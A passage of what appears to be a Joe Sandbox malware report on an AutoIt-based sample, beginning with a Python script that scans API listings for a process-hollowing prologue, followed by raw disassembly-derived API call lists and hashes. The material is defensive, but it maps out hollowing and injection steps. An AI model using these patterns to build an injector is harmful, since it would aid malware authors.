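    r"(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[\w@:]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# e.g. "• Source File: <pid>.<n>.<ts>.<base>.<protect>.<x>.<type>.<y>.sdmp, ..., based on PE: false"
# Assumption: dot-separated fields 4 and 6 are Protect and Type (read off this page's names).
SRC_RE = re.compile(r"Source File:\s*(?P<dump>\S+)\.sdmp.*based on PE:\s*(?P<pe>true|false)")

# args: int for hex literals, None for '?' or strings; indirect: "Part of subcall function" entry
Call = namedtuple("Call", "name args ref indirect")
Region = namedtuple("Region", "protect mem_type backed_by_pe")

def parse_block(text: str) -> tuple:
    """Return (calls in listing order, Region or None) for one function block."""
    calls, region = [], None
    for line in text.splitlines():
        m = API_RE.search(line)
        if m:
            toks = [t.strip() for t in (m["args"] or "").split(",") if t.strip()]
            args = [int(t, 16) if re.fullmatch(r"[0-9A-Fa-f]+", t) else None for t in toks]
            calls.append(Call(m["name"], args, int(m["ref"], 16), m["sub"] is not None))
            continue
        s = SRC_RE.search(line)
        if s:
            f = s["dump"].split(".")
            region = Region(int(f[4], 16), int(f[6], 16), s["pe"] == "true")
    return calls, region

def private_rwx(region) -> bool:
    """Private (non-image) RWX memory is where unpacked stages normally live."""
    return region is not None and region.mem_type == MEM_PRIVATE and region.protect == PAGE_EXECUTE_READWRITE

def _wants_integer_regs(c) -> bool:
    # x86 hollowing reads Eax (entry point) and Ebx (PEB), so CONTEXT_INTEGER must be requested.
    return len(c.args) > 1 and c.args[1] is not None and bool(c.args[1] & CONTEXT_INTEGER)

STAGES = (
    ("spawn", lambda c: c.name in ("CreateProcessW", "CreateProcessA")),
    ("read-context", lambda c: c.name in ("GetThreadContext", "Wow64GetThreadContext") and _wants_integer_regs(c)),
    ("read-peb-imagebase", lambda c: c.name == "ReadProcessMemory" and len(c.args) > 3 and c.args[3] == 4),
    ("write-payload", lambda c: c.name == "WriteProcessMemory"),
    ("hijack-entry", lambda c: c.name in ("SetThreadContext", "Wow64SetThreadContext")),
    ("resume", lambda c: c.name == "ResumeThread"),
)
PROLOGUE = {"spawn", "read-context", "read-peb-imagebase"}

def match_stages(calls) -> list:
    # In-order match over this function's own calls; later stages may sit in a callee.
    hit, nxt = [], 0
    for c in calls:
        if c.indirect:
            continue
        for j in range(nxt, len(STAGES)):
            if STAGES[j][1](c):
                hit.append(STAGES[j][0])
                nxt = j + 1
                break
    return hit

def triage(block: str) -> dict:
    calls, region = parse_block(block)
    stages = match_stages(calls)
    ctx = next((c.args[1] for c in calls if c.name.endswith("GetThreadContext") and len(c.args) > 1), None)
    rwx = private_rwx(region)
    if PROLOGUE <= set(stages):
        verdict = "process-hollowing prologue in " + ("private RWX memory" if rwx else "image-backed code")
    else:
        verdict = "no hollowing pattern"
    return {"stages": stages, "context_full": ctx == CONTEXT_FULL_X86, "private_rwx": rwx, "verdict": verdict}

# Sample blocks transcribed from the report above: the function at 00F739F3 and
# the AutoIt runtime's LoadLibraryExW helper at 007C4E0F.
SAMPLE_INJECTOR = """\
• CreateProcessW.KERNELBASE(?,00000000), ref: 00F739F3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F73A89
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F73AAB
• Source File: 00000000.00000002.1668345500.0000000000F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F71000, based on PE: false
"""
SAMPLE_RUNTIME = """\
  • Part of subcall function 007C4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 007C4BEF
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007C4E0F
• Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
"""
```

To run it over another function in this report, paste that block's API lines and its Source File line into a string and call triage() on it. Entries marked "Part of subcall function" are parsed but skipped for sequence matching, because they belong to a callee rather than to the function being listed; that is also why only the prologue stages are expected to match here, and why a hit should be read together with the signatures in the overview (thread context modification, foreign memory writes) rather than on its own.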
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: f7e2fd9dc63d4305cbfa272c9752891b5bbd0a2c922b30b3a1f7383ea5cc6e6f
                                                        • Instruction ID: a5db94a81aa8342bb7a7d3eb49db3ccaf439c686956f97ad269bc865b29b4e10
                                                        • Opcode Fuzzy Hash: f7e2fd9dc63d4305cbfa272c9752891b5bbd0a2c922b30b3a1f7383ea5cc6e6f
                                                        • Instruction Fuzzy Hash: 09317E79608A02EFC718DF19D490E21F7A0FF09310714C56DE98A8B791EB74E891CF94
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: fa6e3c4c4e7b8dd7984d8d0be01ce48be71d142196050f9d1a186a45dce5a64a
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: 09311370A021459BC718DF0AC480AA9F7A2FB4D300B3487A5E80ACB361D7B5EDC1DBE0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: bc8ba207c6eb3c499db93f217c7559a6f6f8f336a28cc376536e8a64f81005df
                                                        • Instruction ID: f6b583acefe5f0bbb87ef3185336d8f3ac196f2c70b1d6d77462f9411f6f3490
                                                        • Opcode Fuzzy Hash: bc8ba207c6eb3c499db93f217c7559a6f6f8f336a28cc376536e8a64f81005df
                                                        • Instruction Fuzzy Hash: 0241E574604345DFDB24DF24C458F1ABBE0BF49318F0988ACE9998B362C775E845CB52
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 3aa974c2351fdbd07aa32aee7350dc1956dcdd9e1470d55e10f725a6f9468a74
                                                        • Instruction ID: f661a22d0de59d0c4a79147e143b767d9d10ed4c2f6d39a01b4c489bbf3e4a07
                                                        • Opcode Fuzzy Hash: 3aa974c2351fdbd07aa32aee7350dc1956dcdd9e1470d55e10f725a6f9468a74
                                                        • Instruction Fuzzy Hash: 022136B2A04A08EBDB188F25EC45B797BB4FF14350F20842EF58AC52A0EB74C5D0DB55
                                                        APIs
                                                          • Part of subcall function 007C4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 007C4BEF
                                                          • Part of subcall function 007E525B: __wfsopen.LIBCMT ref: 007E5266
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007C4E0F
                                                          • Part of subcall function 007C4B6A: FreeLibrary.KERNEL32(00000000), ref: 007C4BA4
                                                          • Part of subcall function 007C4C70: _memmove.LIBCMT ref: 007C4CBA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                        • String ID:
                                                        • API String ID: 1396898556-0
                                                        • Opcode ID: 392fbbc91f85604bf9247b2c461c7cb5b2976f217deb78a12ff7c286c3be53b2
                                                        • Instruction ID: 0119564c6e1097d27170cf04a8ddff211d7ecc6e3e1bb123399397793eda21d6
                                                        • Opcode Fuzzy Hash: 392fbbc91f85604bf9247b2c461c7cb5b2976f217deb78a12ff7c286c3be53b2
                                                        • Instruction Fuzzy Hash: 1311A731640209EBCF25AFB4C82AFAD77A9AF44750F10842DFA51A7181DB799D019751
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 1f2229621c5a47f3ece2d3b634f1a9aa060bdf4886c0eea23b69adc4db0334a6
                                                        • Instruction ID: da67326fd4d7efaa17230e18b814eac8ef2ae8f6088bd85a985de45780654566
                                                        • Opcode Fuzzy Hash: 1f2229621c5a47f3ece2d3b634f1a9aa060bdf4886c0eea23b69adc4db0334a6
                                                        • Instruction Fuzzy Hash: 7A21EEB4608345DFCB24DF64C848F1ABBE0BF88315F05896CE98A97762D735E805CB92
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 828625f052f4f8645734e182d12e795b27bcf1cb8371bf6a93eda34a18f04556
                                                        • Instruction ID: 3d27a5f1fc45f62e6434e7cc51cf94241aad765a18db94214e393aaa34c39d30
                                                        • Opcode Fuzzy Hash: 828625f052f4f8645734e182d12e795b27bcf1cb8371bf6a93eda34a18f04556
                                                        • Instruction Fuzzy Hash: D101F136502350DFDB315E69EC45AEAB3A8FFC9321B0540AEF904DB411E6F99C89CAD0
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 007E48A6
                                                          • Part of subcall function 007E8B28: __getptd_noexit.LIBCMT ref: 007E8B28
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2597487223-0
                                                        • Opcode ID: 0e89e34785c265052e5a40d8d8a4842611656c007602ee7394331e1175e89950
                                                        • Instruction ID: 946429bbb5aa806e219cbbf305e3cf0539576478b0d78c97316470d99996ae22
                                                        • Opcode Fuzzy Hash: 0e89e34785c265052e5a40d8d8a4842611656c007602ee7394331e1175e89950
                                                        • Instruction Fuzzy Hash: 58F022319036C8EBDF51AFB6CC0E3AE36A0AF08324F148404F428AA1D2CB7CC950DB52
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,008852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007C4E7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: 3058ae84608d709f9407d53349098bdff631d1ca7ea17bcdd483b78a7c2cdf84
                                                        • Instruction ID: 279bf4fdd355807c5840feecfcfea010ea1b3b4077a19e366c6ada01e1e83143
                                                        • Opcode Fuzzy Hash: 3058ae84608d709f9407d53349098bdff631d1ca7ea17bcdd483b78a7c2cdf84
                                                        • Instruction Fuzzy Hash: F5F03971505B11DFCB349F64E4A4D52BBF1BF143293218A3EE2DA82621C73A9840DF40
                                                        APIs
                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007E07B0
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath_memmove
                                                        • String ID:
                                                        • API String ID: 2514874351-0
                                                        • Opcode ID: e53249dbc88d4e1fecc07f3c89d88b9339df8131186674fcb6f771f67f546451
                                                        • Instruction ID: f64ab81377f061c03902a8f93f3ddfd9d79f8431da49fc2d3a99d4bc8e91393e
                                                        • Opcode Fuzzy Hash: e53249dbc88d4e1fecc07f3c89d88b9339df8131186674fcb6f771f67f546451
                                                        • Instruction Fuzzy Hash: 71E086769051289BC720D6589C09FEA779DDF897A0F0441B9FD08D7205D9A5AC8086D0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction ID: 3dda556f60804fb75d6971da946d732a1cc61096a7cb5628db178f43ac2c7e25
                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction Fuzzy Hash: B7B092B644020CB7CE012A82EC02A493B1DAB45768F408020FB0C1C162A677A6649A89
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 00F74249
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668345500.0000000000F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F71000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f71000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: d6d1e461c415d91b871556454a582000b761cea03ca5c5567a0b013f31dc02dc
                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction Fuzzy Hash: 2FE0E67498420DDFDB00DFB4D54969D7BB4EF04301F104161FD05D2280D7309D60DA62
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0084CB37
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0084CB95
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0084CBD6
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0084CC00
                                                        • SendMessageW.USER32 ref: 0084CC29
                                                        • _wcsncpy.LIBCMT ref: 0084CC95
                                                        • GetKeyState.USER32(00000011), ref: 0084CCB6
                                                        • GetKeyState.USER32(00000009), ref: 0084CCC3
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0084CCD9
                                                        • GetKeyState.USER32(00000010), ref: 0084CCE3
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0084CD0C
                                                        • SendMessageW.USER32 ref: 0084CD33
                                                        • SendMessageW.USER32(?,00001030,?,0084B348), ref: 0084CE37
                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0084CE4D
                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0084CE60
                                                        • SetCapture.USER32(?), ref: 0084CE69
                                                        • ClientToScreen.USER32(?,?), ref: 0084CECE
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0084CEDB
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0084CEF5
                                                        • ReleaseCapture.USER32 ref: 0084CF00
                                                        • GetCursorPos.USER32(?), ref: 0084CF3A
                                                        • ScreenToClient.USER32(?,?), ref: 0084CF47
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0084CFA3
                                                        • SendMessageW.USER32 ref: 0084CFD1
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0084D00E
                                                        • SendMessageW.USER32 ref: 0084D03D
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0084D05E
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0084D06D
                                                        • GetCursorPos.USER32(?), ref: 0084D08D
                                                        • ScreenToClient.USER32(?,?), ref: 0084D09A
                                                        • GetParent.USER32(?), ref: 0084D0BA
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0084D123
                                                        • SendMessageW.USER32 ref: 0084D154
                                                        • ClientToScreen.USER32(?,?), ref: 0084D1B2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0084D1E2
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0084D20C
                                                        • SendMessageW.USER32 ref: 0084D22F
                                                        • ClientToScreen.USER32(?,?), ref: 0084D281
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0084D2B5
                                                          • Part of subcall function 007C25DB: GetWindowLongW.USER32(?,000000EB), ref: 007C25EC
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0084D351
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                        • String ID: 0R$@GUI_DRAGID$F
                                                        • API String ID: 3977979337-259995135
                                                        • Opcode ID: 6ece22a32a0fc9fb6647080ada65568833ac8c378fc65d67ada2a8156f2bff7f
                                                        • Instruction ID: 2db9afd62d8b9c317a9152ef2f52b20ef4dc3386c7b3367140ebad012b806613
                                                        • Opcode Fuzzy Hash: 6ece22a32a0fc9fb6647080ada65568833ac8c378fc65d67ada2a8156f2bff7f
                                                        • Instruction Fuzzy Hash: 3A429A78205349AFDB20DF28C888EAABBE9FF49324F14052DF695C72A1D731D854DB52
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_memset
                                                        • String ID: 3c}$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_}
                                                        • API String ID: 1357608183-3415470295
                                                        • Opcode ID: 7bd167e2057ed3172a4492597ce9c5d715421c467fcbda3a15fa096d9f55ebca
                                                        • Instruction ID: 967cc1e53be95d221c3cfbd056de3d633bf70b0d67faf7cb43ff5f45700406a1
                                                        • Opcode Fuzzy Hash: 7bd167e2057ed3172a4492597ce9c5d715421c467fcbda3a15fa096d9f55ebca
                                                        • Instruction Fuzzy Hash: 43938E71A042199BDB28CF98D881BEDB7B5FF48310F24816AE955EB381E7749EC1CB50
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,?), ref: 007C48DF
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007FD665
                                                        • IsIconic.USER32(?), ref: 007FD66E
                                                        • ShowWindow.USER32(?,00000009), ref: 007FD67B
                                                        • SetForegroundWindow.USER32(?), ref: 007FD685
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007FD69B
                                                        • GetCurrentThreadId.KERNEL32 ref: 007FD6A2
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 007FD6AE
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 007FD6BF
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 007FD6C7
                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 007FD6CF
                                                        • SetForegroundWindow.USER32(?), ref: 007FD6D2
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007FD6E7
                                                        • keybd_event.USER32(00000012,00000000), ref: 007FD6F2
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007FD6FC
                                                        • keybd_event.USER32(00000012,00000000), ref: 007FD701
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007FD70A
                                                        • keybd_event.USER32(00000012,00000000), ref: 007FD70F
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007FD719
                                                        • keybd_event.USER32(00000012,00000000), ref: 007FD71E
                                                        • SetForegroundWindow.USER32(?), ref: 007FD721
                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 007FD748
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: d1a282f4d56faaf957490eb7af2c8b0c64e9f872a1a2044ed7218e65c71b412a
                                                        • Instruction ID: 5950d3701342b9a7f78eb77d7dee22f1d57ce4266b93c22fb5a7698b608b622f
                                                        • Opcode Fuzzy Hash: d1a282f4d56faaf957490eb7af2c8b0c64e9f872a1a2044ed7218e65c71b412a
                                                        • Instruction Fuzzy Hash: A4316275A4031CBBEB206BA19C49F7F7E6DFB45B50F114029FB05EA2D1C6B45D00EAA0
                                                        APIs
                                                          • Part of subcall function 008187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0081882B
                                                          • Part of subcall function 008187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00818858
                                                          • Part of subcall function 008187E1: GetLastError.KERNEL32 ref: 00818865
